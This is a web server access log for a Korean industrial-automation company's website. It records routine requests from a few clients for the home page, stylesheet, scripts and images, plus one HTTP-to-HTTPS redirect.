+[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:49 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:11:56:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:15:35 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 68.183.27.37] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[18/Feb/2026:12:15:36 +0000] - - 301 - GET http www.hanmocnn.co.kr "/favicon.ico" [Client 68.183.27.37] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://www.hanmocnn.co.kr/" +[18/Feb/2026:12:15:37 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 68.183.27.37] [Length 10554] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[18/Feb/2026:12:15:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 68.183.27.37] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:35 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:36 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:44:39 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:12:46:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10544] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:06:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10486] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:09:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 